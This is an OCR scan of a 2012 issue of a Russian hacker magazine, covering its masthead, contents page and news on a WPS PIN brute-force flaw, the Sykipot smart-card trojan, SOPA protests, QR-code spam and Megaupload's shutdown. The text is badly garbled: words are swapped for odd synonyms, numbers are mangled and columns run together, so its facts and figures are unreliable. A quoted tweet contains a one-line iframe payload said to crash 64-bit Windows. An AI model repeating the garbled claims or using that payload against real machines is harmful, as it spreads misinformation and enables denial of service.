Page 0

Исчерпывающий гайд по шоппингу во китайских интернет-магазинах


_.....

-пF.нЕР РЕДАКЦИЯ Главный вычитчик

Никуся (<nikitozz)) Кислицин

Шеф-редактор

венок ((step)) Ильин lstepfareal.xakep.ru ) Николай ((gorl)) Андреев [ gorlumrarea l. xakep . гu l

Выпускающий вычитчик

[nikitoziOreal.xakep ru )

Редакторы рубрик

PC_ZONE да UNITS

Степаха ((step)) Ильин

взламывание

РR-директор

Маг (maggiOreal.xakep.ru ) Андрей ((Andrushock» Матвеев landrushockiOreal.xakep.ru ] Александр «Dr. Кlouniz» Лозовский lalexanderlё!real.xakeo . ru] Николай <<gогi>>Андреев [gorlumffireal.xakep.ru J Анна Г риrорьева [grigorievafaglc.ru ]

Литературный вычитчик

Лена Болотникова

UNIXOIO равно SYN/ACK MALWARE КОДИНГ

DVD Выпускающий вычитчик

широкий с<аnt>>Жуков

Uniх-раздел Security - paздeл

Андрюня «Andrushock" Матвеев [andrushockffireal.xakep.ru ) Дмитрий «01g1 >>Евдокимов

Монтаж видео

Макс Трубицын

(antrareal xakep.ru ]

ART Арт-директор

Алик Вайнер 0~1

Дизайнер

Георгий Пономарев

Верстальщик

Веруся Светлых

Иллюстрация для обложке

Санюра Брички н

PUBLISHING Учредитель

000 «Г ей м Лэнд>>, 015280, Москва, 5 этаж, контора N<> 01. Т ел.: (4951935-7034, факс: (4951545-0906

у л. Ленинская Слобода, 09, Омега nлаза,

ПРИВЕТ С АНТАРКТИДЫ

Генеральныйдиректор

Митрей Агарунов

Генеральный король печати

Андрон Михайлюк

Финансовый принципал

Андреич Фатеркин

Директор по мнению маркетингу

Алёна Каркашадзе

Управляющий арт ·директор

Алик Вайнер

Главныйдизайнер

Энди Тернбулл

Директор соответственно nроизводству

высокочтимый Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ

Две недели взад получил особенное электронное письмо, которое меняпо-хорошемутронуло равным образом заставило поразмышлять что касается вечном. Писал

Т ел.: (4951935-7034, факс: (4951545 -0906

РЕКЛАМНЫЙ ОТДЕЛ

СерегаСильнов-редактор рубрики «Фри кинг >>, тот или другой сызнова

Директор груnnы TECHNOLOGY

во прошлом годуотправился во научную экспедицию вднтактиду.

Старшие менеджеры

Письмо следовательно особенны м, благодаря этому который отправлено почти не со южного полюса да передано по части коротковолновой блат со скоростью бод путем

-50 неком мерческую радиолюбительскую трал Wl NLl NK.

В письме высокий передавал приветы да рассказывал об своих впе­ чатлениях , которые на таком необычном месте рождаются ото самых простых вещей.

Менеджер Директор корпоративной группы Старший менеджер Менеджер Старший трафик·менеджер

Мара Филатова (filatovaiOglc.гu l Ольга Емельянцева ( olgaemiiOglc . гu l Оксана Алехина falekhinaraglc.rul Елена Поликарпова ( polika r povalё!glc.ru ) [работа из рекламными агентствами] Кристина Т атаренкова [tatarenkovafOglc.ru ] Юлия Г ос подинова f gospoфnova fOglc . ru ] Мария Дубровская (dubгovskayaiOglc гu l Марья Буланова [ bulanovaГclglc:.ru )

ОТДЕЛРЕАЛИЭАЦИИСПЕЦПРОЕКТОВ

Впрочем, весь сия романтика была только что сопутствующей вещью про

Директор

Саныч Коренфельд l koгenfeldiOglc. гu l

Сергея, во всяком случае дьявол приехал тама во составе экспедиции, которая должна

Менеджеры

светлая Мюллер Наталия Тулинова

была пробурить 0 068 метров льда равно обязательно дотян уться до подледного озера Восток, безграмотный навредив ему. Озеро действитель­

РАСПРОСТРАНЕНИЕ

а огромное:

Директор в области дистрибуции

Кошелева Танюся

Руководитель отдела nодпис ки

Клепикова Витуся Oepikovalё!glc. ru )

050 километров

на длину, 00-в ширин у, равным образом до самого 0.2-в

глубину. Учи тывая , зачем оно было изолировано с внешнего мира сотни тысяч лет, вопросы об обитающих на этом озере формах жизни и по отношению том, что-нибудь не вдаваясь в подробности со временем происходит, -ч ертовски интересны: до­ стоверно об этом человечеству нисколько никак не секрет полишинеля . Не приближенно медянка бессчетно

осталось получай планетенеизученных уголков,- да вона озерко Восток являетсяоднимиэтаких объектов.

Какова но была моя радость, от случая к случаю настоящее [5 февраля) моя особа прочел но­

[koshelevalaglc.ru l

Руководитель

Лукичева Наталья Hukichevafaglc.ru ]

спецрасnространен да моя особа

Претензии равным образом дополнительная ан фа: В случае возникновения вопросов объединение качеству печати равным образом ОVО-дисков: claimlё!glc.ru . Горячая цепь сообразно подnиске

Факсдля отправки купонов равно квитанций держи новые подписки:

[495] 045-09-06

Телефон отдела подnискидля жителей Москвы: [495) 063-82-77 Т елефон чтобы жителей регионов да на звонков не без; мобильных телефонов: 0-800-200-3-999

вость касательно том, что такое? российская отправка достигла побег пе ха идоб урила

Дnя nисем:

эту скважину, реализовав проект, длившийся побольше

Зарегистрировано на Министерстве Российской Федерации по мнению делам nечати, телерадиовещанию

00 лет! Чертов­

ски горд из-за Сергея равным образом его коллег-российских ученых, работающих в этой экспедиции да решившихтакую сложную задачу! Выполняю

его просьбу: передаю приветик по всем статьям читателям Х от Антарктиды : ).

001000, Москва, Главnочтамт, а/я 052, Хакер

да средствам массовых коммуникаций ПИЯ Отпечатано на тиnографии

07-11802

с 04.02.2002.

Scanweb, Финляндия. Т равным образом возбуждение 019 033 экземпляров.

Мнение редакции отнюдь не кровь из носу совпадаете мнением авторов. Все материалы на номере

P.S.

Сергий обещал совершить фотографию не без; вытоптанным на снегу

в фоне полярной станции логотипом Хакера. Ждем его возвра­

щения:).

предоставляются в качестве кого оповещение ко размышлению. Лица, использующиеданную информацию в nротивозаконных целях, могут бытовать nривлечены ко ответственности. Редакция безграмотный слабит ответ­ ственности после сюжет рекламных объявлений на номере.За nереnечатку наших материалов без спроса- nреследуем.

По воnросам лицензирования равно nолучения nрав сверху утилизация редакционных материалов

nikitozz, rn. ре д. Х shop.glc.ru/xakep vkontakte.ru/xakep mag

ХАКЕР

03/158/2012

журнала обращайтесь по мнению адресу: contentragtc.ru .

© 000 «ГеймЛзнд», РФ, 0012

001


Content MEGANEWS

016

Колонка Степы Ильинна

017

Proof-of-concept

О хранении паралей

Все новое из-за новый месяцочек

011

hacker tweets Хак-сценавтви ттер е

РЕГУЛЯРНО ПОЛЬЗУЮТСЯ

008

HEADER 004

0АМИЛЛИНОВАМЕРИКАНЦЕВ

ТЕХНОЛОГИЕЙ ОR-КОДОВ

За дач а: сконцентрировать интересные исходняк вместе с PasteЬin . com

COVERSTORY

030

Большая охота Интервью со ведущим хед­ хантером рунета

COVERSTORY

COVERSTORY

018

02,

Ломаем Wi-Fi

Расщепляй да

ради

властвуй

00 часов Получаем WPAключ чтобы Wi-Fi не без;

Уязвимости рас-

через уязви-

са да внедрения

муж технологии

заголовков на со-

WPS

временном вебе

щепления ради ошибаться


048

038

PCZONE

-

UNIXOID

В небесная империя следовать покупками?

004

Свободачерезизоляцию

008

Федоринасча ст ье

Из аюшки? состоят безопасные Liпuх - дистрибутивы

Семь китайских интернет-магазинов со всякой всячиной

042

Проверка держи крепость

Мини-обзор заслуживаю щ их внимания изме н е н ий

Тестируем универсальную распознавалку САР Т СНА

048

Фреймворкдля пентестера

во последних версиях F edoгa

Тестируем сохранность веб-приложения вместе с через

01 О

wЗaf

052

Интегрируем Liпux равно <<облачные» сервисы

хакинг

-

SYN/ACK

Easy-Hack

014

В поискахинсайдера

020

Корпоративныесвязи

Борьба из утечками корпоративной информа ц ии

Хакерекие секреты простых вещей

056

Достучаться давно небес

Обзорэксплоитов

Анализ свеженькихуязвимсетей

Опенсорсные решения к централизованного

062

РНР - лодка интересах

управления доступом ко ресурсам

066

0сап сгасk it!

Создаем высокопроизводительный сайт

Решение заданий в целях хак-конкурса, учрежденного

от использованием

Windows

Кодим бота интересах распределенных вычислений

024

Испытаниенагрузкой

nginx равным образом Django

Управлением правительстве н утнапиштим блат

Великобритании

070

Фальшивые

SMS: похудей следовать 00 дней!

Всяподного т ная известноголохетро н а

074

X-Too ls

-

FERRUM

030

От <<винта » ! Тестирование внешних жесткихдисков вместе с

Программы с целью взлома

036

Ed i f i eг

WEXLER.BOOKТ7055

USB 0.0

R2500

Обзор универсальной активной стереосистемы

-

MALWARE

038

076

Веселая тройкабуткитов

-

И шве ц , равно жнец, равным образом возьми дуде игрец вместе с ц ве т ным

Самыетехнологичные угрозы

0011

лета

на веселых картинках

082

Малварьдля мобильных << окошек »

Исследуем трафарет безопасности п опулярной ОС д лясмартфоновнапрактике

КОДИНГ 088

Формграббердля

FAQUNIТED

043

Диско

044

0.5 Гб всякой WWW2

Google Chгome

Расширяем внутренние резервы препроцессора С/С++ с помощ ь ю сторо н него кодегенератора

096

0адачинасобеседованиях П одборкаинтересныхзаданий,которыедают на собеседованиях

000

Паттерны проектирования <<Адаптер» да «Фасад» Меняем равным образом н терфейсы классов вне ущерба пользу кого з д оровья

Большой

FAQ всячины

Удобные wеЬ-сервисы

равно род их перехвата на спринклер ре через Google И целого Си чуточку

юниты

040

Исследуем отправку зашифрованных форм

094

сенсор н ым дисплеем

010

0.0


MEGANEWS НОВАЯ ДЫРКА В WPS ОБЛЕГЧАЕТЗАДАЧУХАКЕРАМ БРУТФОРСИМ ЛЕГКО И БЫСТРО

GOOGLE ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ ПАТЕНТОВ. Истцом выстуnает Bг i t i sh

Telecom -одна изо круnне й ших во мире телекоммуникационных комnаний.

ТРОЯ Н ОХОТИТСЯ НА С МАРТ-КАРТЫ ВОЕННЫХ МАЛВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ -АТАК,

н

еприя т нуюуязвимостьна­

шел на вместе с т андарте

СМЕНИЛА ПРОФИЛЬ

WPS [Wi- Fi

Pгotected Setupl исследо­

ватель во области информационной безопасности Стефан В равным образом бок, касательно чем и поспе ш равным образом л уве д омить U S-CERТ. Д ырка присутствует на продуктах мно­ гих популярных брендов, во томик числе

0-Link, Netgeaг, Linksys да Buffalo. Она позволяет ощутимо отстранить время,

уходящее возьми брутфорс РIN-кода, который необходим к установки беспроводного роутера. В результате о ш ибки для атакующему возвращается слишком бездна информации по части РIN­ коде, а самовольно спирт становится слабее, что далеко не г ативно влияет сверху защиту

тысяч, неравно никак не миллионов

Wi-Fi-

ма ршр у т изаторов да точек дост упа.

В

а

US-C ERT поясняют: «Если

nроверка

D

троянце

Sykipot, казалось бы,

отсутствует синь порох особен­

ного- малварь, ориен т ирова нн ая получи п охищение

данных касательно смарт-картах, безвыгодный нова . Но отнюдь не первый попавшийся

деньувидишь малварь, план которой - смарт-карты

сотрудников Министерства обороны С Ш А равным образом п олучение с их помо щ ьюнесанкционированного д оступа ко относительно г ра­

ниченным ресурсам. Именно т акие модификации во коде

сообразно д линности РIN-кода завершилась

Sykipot обнаружили специалисты

неуда ч но, этап доступа посылает

Одна изо новых функций троянца обеспечи во ает взаимо­

сообще н ие

мероприятие со ПО

EA P-NACK н азад клиенту.

компании

Activ ldentity ActivC ii ent,

AlienVault.

ко ото орое как бы единожды

Эти сведения пересылают ся таким

работает со смарт-картами, соо т ветс т вующими ста н дар­

образом,чтохакеруудаетсяопреде­

после этого безопаснос т да Минобороны С Ш А. В американском

лить, является ли первая женка

Минобороны такие карточки использую т ся на хранения

РI N - ко д а во ер н ой. Пос л едняя циферка

цифровых сертификатов рабо т ников равно их РI N-ко д об на , nри­

Отметим, зачем ни единственный

еще известна, эдак наравне симпатия являет-

ме н яемыхдля аутентификации. В резул ьт атетехнического

изо производителей,

ся кон т рольной суммой РIN-кода.

анализа специалистам

В се сие зна ч ительно сокращает

новоявленный модифицирование заключение скомпи л ирован е щ е во марте

мости, безграмотный выпустил

количес т умереть и отнюдь не встать п опыток, требуемыхдля

же симпатия перед этих пор был безвыгодный жирно будет во всю ширь распространен.

ее корректирование .

усnеш н ого брутфорса: относительно н насчёт снижается

Он станет перехватыватьданные об сер т ификатах равным образом п ри

пищевые продукты которых подвержены уязви­

В своей статье Вибок пишет, сколько лучшим

из

способом борьбы

сяч>>. По д робнее об этом твоя милость можешь

димых РIN-кодах. После перехвата

п рочи т ать на одной с статей рубрики

краденую информацию н а защищенные р есурсы на Китае.

со дыркой возьми данный моментявляется

отключениеWРS .

00'8 д касательно 00'3 + 00'4, в таком случае поглощать поперед 01 ты­

AlienVault посчастливилось на ыяснить, что 2011 года,

Соvе г Stогуэтого н омера.

помощи на строенного кейло г гера лишать дан н ые что касается на на о­

Sykipot переправляет

Э т о, на п рочем, н е говорит в рассуждении т ом, который в области л у ч атели несомненно н ных тоже находятся на КНР.

@wЗ bdЗvil

<iframe height='18082563'></i causes а BSoD on \vi.n 0 х64 via

Lol!

Yota КОМПАНИЯ <<СКАРТЕЛ>>

ПОРТЫ СТАНДАРТАUSВЗ.О

ПРОИЗВОДИТЕЛЬ LINUX-

СКОРО, наконец, nоявятся

ДИСТРИБУТИВАМАNDRIVА,

WINDOWSPHONE MARKETPLACE nерешагнул

KOMAHДAIPHONE DEV-ТЕАМ,

(БРЕНД УОТА) ЗАПУСТИЛА В НОВОСИБИРСКЕ nервую

для смартфонах да nланше-

контролируемый российским

отметкув50тысячnри-

джейлбрейк nод iOS 0.01 про

трал

LTE во России . Сейчас

тах.ПоинформациисСЕS,

фондом

ложений. На сие магазину

iPhone45 равно iPad 0. За nервые

трал включает6З базовые

nроизойдет сие во конце 0012-

анонсировать относительно банкротстве.

nонадобилось14месяцев

тридняутилитускачало

станции, хотя для марту их ранее

го не в таком случае — не то на начале 0013 года.

Увы, положение у комnании абсолютно

(Andгoid Maгket во свое минута

побольше одного миллиона

nлохи .

nотребовалось 09).

засранец .

станет150.

001,

NGI, лихо может

наконец-то, выnустила

ХАКЕР

03 /158/ 0012


...;;; N

N

..; ш

u u

~

0-

=il

:J: а..

об

LO

u :..: < :!Е

х

LO

:!Е L-

:J: ш

:..: :s: а..

LO

~

:J: ш

01ш

а..

~ :s: u

< :!Е ~ :!Е

ш ш а..

:!Е

ш

а а..

0:J:

в рассуждении

:..:

g 1:: о

:J: ш

с:

011

в отношении

0-

е

. м

:s:

Реклама . Товар произведен во соответствии от Техническим Регламентом сверху табачную продукцию.

~~dдr~~~~~r~d~~т~~ r~~~~~ ~rrд~~rrжд~rт:

~ ~rt~~t ~rtд~т ~~шtм~ dд~r~~ью


MEGANEWS

03% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ NAND скупила на четвертом квартале прошлого лета Apple.

ПЛАНШЕТ, ПРИСТАВКА ИЛИ ЧТО-ТО ДРУГОЕ? СМЕЛЫЙ КОНЦЕПТ ОТ RAZER

nредварительно озвученыследую­ щиетехнические ха­

рактеристики : диcплeй

размером 00,1дюйма

равно разрешением 0280 х 800 пикселей , много­ канальнаязвуковая

подсистема Dolby

0.11п роектируемая вместесТНХI. сред­ ства беспроводного подключения

Wi-Fi802.11b/g/n и Bluetooth 0.0. Планиру ется равным образом

РАССМОТРЕНИЕSОРА И РIРАОТЛОЖЕНО О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ РЕЗУЛЬТАТАХ

m

ы ранее рассказывали что касается «чудесны х» американских

зако н в рассуждении nр оектах SOPA IStop Online Р iгасу Act] равно

PIPA IPROTECT lntellectual Р горегtу Act], nородивших

волну негодования неграмотный только лишь бери Заnаде, однако за по всем статьям у миру. Для

тех. ктоумудрился однако относительно nустить. напоминаем: зако нопро ­

екты обязывают всех у ч астни заговор се ти сеть lпровай деры, хос тинги , п оиско ваш брат е из равно не без; темы равным образом пр.] по мнению первомутребованию правообладателя !без решения суда] отгонять пиратский контент равно прекращатьлюбые вза имоотно шения от nират­

использоватьаксе­

екими сер во исам и. Платежные системы обязаны отключить

лерометры да сенсор­

во озможность перев похвала д е н е г, поисковики -удалить ссылки

ный киноискусство .

бери сайты да т. д . В случае невыполнения эт ихтребований ты считаешься соучастником да твой сайт могуттакже закрыть без свида равно следствия. Кстати, иностранные сайты, сервера

которых расположены во США. будут переть такую но ответ­ ственность вслед за подпольный контент, на правах буде бы они бы ли учреждены на Штат ах. Б олее основательно со законо nроектами и их возможными последствиями не запрещается осведомиться хо тя

бы во В икипедии, а нас сего миг хлеще интересуют n осле д ­ ствия. П оняв, что-нибудь «СО ПАблизка », крупные американские

корnорации ощу т либо угрозу ради себя любимых . За дра ко­ новские мероприятия выступили, ко прототип у, М РАА, RIAA равным образом альянс BSA !членами которого являются Microsoft, Apple, Adobe, lпt el равно т. д.]. Зато навстречу выеказались Google. Twitteг, Mozi lla, Facebook, Yahoo, еВ тю-тю равным образом дру гие представители интернет­

во

м ериканекая общество Rаzегхорошо известна закачаешься во всех отношениях мире !в волюм чис­

индустрии. Чем ближе становился « деньХ », получи какой было

ле равным образом во России] на правах производчик периферийных игровых устройств

запланированор дока смотре ние зако нопроектов во Конгресс~

равным образом принадлежностей. И нужно заметить, хороших- сей поры ваш покорный слуга п ишу эту но­

тем в большинстве случаев накаляли от ь от тра сти. В осемна дцат ого января

вость, моя связи на правах в один из дней лежит сверху мышке от былоувидеть

Project Fiоnа-проект,

Razer. Тем

интереснее равно неожиданнее

надо которым на комnании работаютсейчас

да тот или иной был nредставлен получи выставке

CES 0012.

Эта концеnция nредставляет

во интернете прошла, пожалуй, самая массовая онлайновая акция протеста следовать до сей времени промежуток времени его су ществования. Англоя­ зычная Википедия nровела самый большой во истории

из себя игровой nланшет, ориентированный получи игры, сверху иболее nоnулярные сей­

опрос, nодавляющее значительная участников ко так рого

минута получи и распишись ПК. ведь вкушать бери зрелище <<nрожорливые>> да мощ ные . Ус т ройство nланируется

поддержало разъединение англоязычного раздела получай су тки

уснастить «интуитивными элементами уnравления» !кнопками равно аналоговыми

на отметка протеста.

джойстиками] со с позиции силы обратной связью. Где как равно по образу они будут расnоло ­

свойлоготип черным прямоугольником цензуры . Поддержа­

жены, недурственно заметно в иллюстрации. А гла вн ое, основой Pгoject

ли протести на WoгdPгess. В целом ко задел протеста Ыackout

останавливаться nроцессор lпtel Соге

примкнулитысячи сайтов сообразно всему миру. Н еспадко пришло сь

из нехваткой игр про планшета- суперидея заключается во том, сколько прагматично всегда

да сторонникам SOPA. Та к. громаднейший во мире регистратор GoDaddy, nоддерживавший SOPA, подвергся жес т комубой­

Fi ona должен i7 третьего поколения. Заявлено, ась? в области этому вопро­ су бражка грудь в грудь сотрудничаете lntel. Этот ходдолжен устрани т ь проблему

Reddit приостановил работу. Google прикрыл

существующие зрелище смогут подвизаться для устройстве кроме какой-либо nеределки

котуса сторо ны интернет-сообщества: пользователи приня­

другими словами доработки. Ты скаже ш ь. чт в рассуждении этотолько концепт. равным образом будешь безграмотный прав. Специа­

ли сь тысячами у править со вои домены через GoDaddy. Регистратор

листы Rаzегпочти готовы изъявить работающие образцы. Предполагается, ась?

оцени л ситуацию да поспешил отказатьс пишущий эти строки отсвоих слов,

поставки устройства начнутся поуже во четвертом квартале текущего года. Стоить

однако сообразно зже во собеседование TechCrunch затылок из нил ось. что-нибудь

планшет долженствует невыгодный паче $1000.

nо-nрежнему поддерживаетSОРА ... В общем , отт ок изба е нов

GoDadd y

продол жается да сейчас. Сдался nоддавлением народного негодования равным образом корпорация

ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США.

BSA, заявивший , аюшки? SOPA «требует доработки ». П отом, уловив тенденцию. «пере д рассудок разве » да сенаторы, ратовавшие

следовать а нт ипиратские законоnроекты. В осем ь американских

законо дате л ейотк а после лись п оддерживать SOPA nосле

08

ZAPPOS.COM УВЕДОМИЛ 0' МЛН

января да Ыackout'a, кой-какие равным образом ни возьми лепту встали сверху сторону

КЛИЕНТОВ О ТОМ, ЧТО БД МА­ ГАЗИНА ВЗЛОМАНА И ИНФОР­ МАЦИЯ О НИХ МОГЛА ПОПАСТЬ В РУКИ ХАКЕРОВ

первоначально nр е дставивший законоnроектSО РА . отозвал его,

006

протестующих. И сколько на равным образом т оге? Конгрессмен Ламар Смит, из­ при знав, что-нибудь во нынешнем виде норма далеко не можетбыть принят.

Рассмотрение зако н оnроек та было отложено.

PIPA nо­

сти гла та а участь. Можно ли в з вать сие nобедой ? Вряд ли. Л оббисты равным образом копирасты рассержены, н по отношению останав лива ться они несобираются,полагая,чтосенаторов«затерроризировала бло г осфера». Теперьлоббист ы намере ны крошечку nересмо­

третья часть n об д шаг ко пробл еме. Звучит зловеще.

ХАКЕР

03/158/2012


0 ФИШЕК

BUFFALO CLOUDSTATION Собственный облачный сервер Buffalo CloudStation- сие не NAS. Хранилище

установившийся

Удобный бэкап Традиционно пользу кого решений

nросто

nозволяет

быстро управлять прогнанный дост уn для

данным от всемирная паутина nрактически из любых

Производительная

устройств: во вкусе со стационарного комnьютера,

таблица

в такой мере равно не без; мобильных девайсов.

Buffalo

бэкаn данных не без; клиентских машин

Несмотря нате комnактные размеры

орагниэовывается беда nросто. При

[15Dx175x45 ммl , сетевое кладовая

этом nоддерживается как так да МАС

05.

Windows,

оснащено порядочно nрои зводитель­

Ус тро йство nоль-

ным но л езом, которое nозволяет никак не

ностью совместимо со эnnловской технологией

лишь только распустить стремительный сете­ вой достуn для файлам, а равно реализо-

Time Machine.

вать некоторые nолезные функции.

Встроенный

Припожения дпя

BitTorrent-клиeнт

iOS равно Android Приложение

Webaccess

Как равно превалирующая современных NAS'oв,

соз­

Buffa lo

оснащен встро­

имеется в целях удаленного дост у nа

CloudStation

от мобильных усишко тр ойств ко дан­

ен ным ВitТоггеnt-клиентом из

ным, хранящИмся возьми решениях

удобным wеЬ-интерфейсом.

фирмы

Эту функцию соответственно достоинству

Bu ffalo.

Одновременно

nоддерживается небольшую толику

оценят любители интенсивно­

хра нилищ, а само nриложение

го р2р-обмена: шатать торрен­

умее т мучиться от файлами во сех nоnулярных форматов: ото ви­ део, фотографий да музыки до раз ноформатны х д окументов.

твоя милость способен на разы удобней.

Перекодировка

Большой габариты

медиафайлов

равно энергоэффективность

Bu ffalo CloudStation

умеет мотор -

матически кодировать вполне виде­ оконтент на нужном размере nри

удаленном достуnе из мобильных устройств. Та ким образом, можно удобно смотреть, наnример, видео в айфоне, безграмотный задумываясь

относительно nерекодировке файлов.

Устройство nозволяет разместить в себя сам по части себе диск от

0 вплоть до 0 Тб.

SATA-11

объемом

Среднее энерго­

n отребление nри этом невыгодный если т nревышать

06

Вт. При текущих

расценках сверху э лектроэнергию , во

годок сие nозволяет соблюдать экономию давно

0

тысяч рублей, даже если обдумывать с обычным ПК .

ХАКЕР

03/158/2012

007


MEGANEWS

ИНДОНЕЗИЙСКИЙ ХАКЕР HMEI7 дефейснул за единый вздох цифра доменов верхнего уровня , принадлежащих компании S i emeпs.

QR-КОДЫ МОГУТ БЫТЬ ОПАСНЫ

MEGAUPLOAD

КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ

ФБРЗАКРЫЛООДИН ИЗ КРУПНЕЙШИХ ФАЙЛООБМЕННИКОВ

насчёт

ВСЕ

пасный прежний создан на С Ш А-ФБР закрыло

нераздельно с крупнейших Файлаобменников на путы

Megaupload, генерировавший, no его собствен­ 4% лишь интернет-трафика. Похоже

ным данным, вблизи

n

нате маргиналия <<желтой>> новости , но, увы, сие реальность.

рактически безвыездно интересныетехнологические новинки чем свет либо — либо перед смертью не надышишься оказываются «на служ­

По запросу американских спецслужб на Н овой Зеландии

бе» у криминала. Н е избежали этой участи равно

и были арестованы зачинатель nроекта Ким

QR-

продаж смартфонов , планшетов равным образом других мобильных

ное решение

девайсов.

чество,

Специалисты

Dotcom

Шмитц да покамест три человека. Каждому изо них грозиттюрем­

коды,популярностькоторыхрастетвместесувеличением

Websense ThгeatSeekeг Netwoгk об­

no трем обвинениям: 00 планирование вслед за мошенни­ 20 полет вслед за застирывание денег равным образом в области пятеро планирование из-за отдельный

прецедент нарушения копирайта! Помимо этого, выдвинуты

обвинения nротив трех граждан других стран. Эти люд

наружили сп а м-сообщения, ссылающиеся возьми страницы со вс т роенными QR-кодам и. П что касается всей на идимости, что-то около из па­

имели пропорция для проектам компании. П по части мнению

мероприятия обходят спам-фильтры да пытаются принудить nоль­

Де n артамента юстиции С Ш А,

зователей вскрывать ссылки то-то и есть со через мобиль­

распространению пиратского контента . За пятеро планирование рабо­

ных устройств. Сп а м выглядит что традиционная шумиха

твоя милость возлюбленный прошел слух нанес индустрии развлечений повреждение на раз­

фар автор сих строк да содержитссылку нате сайт 0tag .nl -

мере $500 млн на виде недоnолученной прибыли . Кроме

во полне легаль­

ный сервис, позволяющий строить QR - ко д ы интересах

того, файлаобменник породил <<криминальные денежные

URL-

потоки>> !от рекламы равно продажи премиум-аккаунтовl насумму$175м л н.

aдpecoв. Как только лишь читатель перехо д равно т п насчёт ссылке,

нате экране отображается QR-код, а сnрава через него - адрес. Когда nользователь считывает QR-код, его устройство либо бессознательно nереходит no зашифрованному адре­

су, либо сnрашиваету юзера чёткость lв зависимости от версии QR-читалкиl . Эту исключение ле г ко не запрещается ис­ пользовать про распространения специфич н ой малвари

вследствие уязвимостивмобильных браузерах : тем отнюдь не менее обы ч но эти коды сканируют особенно из через смартфонов . Увы, этот «виток эволюции>> во атаках сверху мобильные девайсы предсказывали многие аналитики.

Megaupload сnособствовал

а

Уже nоследовала молчание других ресурсов со аналогич­

Поданным ко омпа­ ни ис оm5соге , 04 м лн амери для анцев

на возрасте ото

08

ным функционалом : ко nримеру, прославленный хостинг-сервис

FileSonic объявил относительно полном

отключении файлаобменного

по З4л е тр е гулярно

функцианала !составляющего, заметим, его суть) : днесь

используют

списывать контент, хороший другими nользователя­

близкие мобильные

у не без; т ро й ства дл я чтен равно мы QR -к одов . А тогда ещ е недавно QR- ко оды были по­ пулярн ы на осно вн об м

н а Восто ке.

ми, невозможно.

Отреагировала равным образом «сетевая оппозиция>>-Апоnуmоus атаковали сайты ФБР, Минюста США , Белого дома,

RIAA,

М РАА равно запас прочих организаций, по вине действий которых был закрыт файлаобменный сервис.

THUNDERBOLTтм

оов

ИНТЕРФЕЙСТНUNDЕRВОLТСКОРОДОБЕРЕТСЯДОПК

РЯДНЕБОЛЬШИХКОММЕРЧЕ­

ANDROIDINVASIONCOCCЫЛKOЙ

HAБAЗEWINDOWS. Этy радостную сообщение сообщаетнам

СКИХ IPV6-CETEЙ пла ниру­

НАПРОГРАММИСТАGООGLЕСО­

книга DigiTime. По информации источника (данные в отношении ко­

ется наладить на Китае

ОБЩАЕТ, аюшки? Googl e на от кором

тором неграмотный раскрываются) , строй << железных » гигантов, таких

ко концу201 0 года. А еще

будущем м ожет похерачить вас ­

какSопу, Asus, Gigabyte Technologyи ASRock, сделано деятельно

во

прием м обильны х n р оце от сорав

внедряетТhundегЬоlt во приманка nродукты. Новое крица

во Поднебесной стандартным

nод от обственнымтов а рны м

надлежит по головке безграмотный погладить предварительно рынка во апрелетекущего годы .

nрото ко олом .

з нако м.

0015 году 0Рv6должен стоить

ХА КЕ Р

03 / 058/2012


итоги

IGRDUPiB

КОНКУРСА НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ СОВМЕСТНО С КОМПАНИЕЙ GROUP-IB, СПЕЦИАЛИЭИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. Напомним, во рамках соревнования было нуждаться скоротать открытие махом двух !Т-инцидентов: утечки конфиденциальных данных нате предприятии, а круглым счетом но взлома сервера в базе Liпux.

Победителями конкурса являются [в алфавитном порядке):

КОНСТАНТИН ИЛЬИН

~Еонид WАнин

ст дент 0 курса Физико-технического

Род занятий:

У

института

НТУУ "Киевский политех-

нический институт", Киев.

Комментарии nобедитеnя:

«Конку рс понравился, провед

е н получай высоком техниче­

шил в дальнейшем рычаги

вместе с кусок ~ровне. Прдинятdь уч~~:~и~~сь хорошее впечатле­ с фреимворком

батман пе,

ние относительно квалификации организаторов».

К сожале нию, обе щанный суперприз [трудоустройство во

Отчеты победителей

Group-IBI безграмотный подошел ни одному изо победителей:

опубликованы возьми нашем сайте:

твёрдый учится во Киеве равным образом на срок невыгодный может пересечь

www. xakep.ru/post/58241 0

на Москву, а Леонида совсем усик траивает да текущее место работы . Тем далеко не менее, ради однако было честно, пишущий сии строки

награждаем победителей ценными призами: каждый получает за

iPad 0 Wi-Fi

ЗG

06Gb.

Будь от нами! Стань одним изо нас!


MEGANEWS

FАСЕВООКВЫПУСТИЛ СО6СТВЕННЫЙ МЕССЕДЖЕР для того Windows, а ВКонтактетем временем те со тируетсерв равно не без; видеозвонков

ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХДЮЙМОВ НОВИНКА ОТ SAMSUNG НА РLS·МАТРИЦЕ

н

а прошед ш ей безграмотный д авно на Лас-Вегасе выставке

СЕ5

0012 близкие

последние разработки продемон ­

стрировали топо на ые производители <<железа»

со токмо мира. Интересного получи и распишись СЕ5было много, а пере­ числить однако мы, ко сожалению, безграмотный имеем возможности, в такой мере

что-нибудь придется ограничиться малы м. Одной с самых ярких новинок, пре д ставлен н ых получи выставке, стал мони т гвалт

027В970 что касается т компании 0amsuпg, продолжающий 0-ю премиум - серию. Этот 07-дюймовый установка интересен

тем , аюшки? дьявол работает получи основе технологии PL5 IPiaпe L iпe 5witchingl. П что до сути, сие тождество IP5 lln-Piane 0witchingl oт5amsung . Так по образу I Р5-матрицы сверху определённый момент являются <<вершиной провиантский цепи», сия старая-новая т ехноло г ия заи н тересовала многих.

П ервый блиночек

y5amsung,

однако, вышел комом: двойка мо­

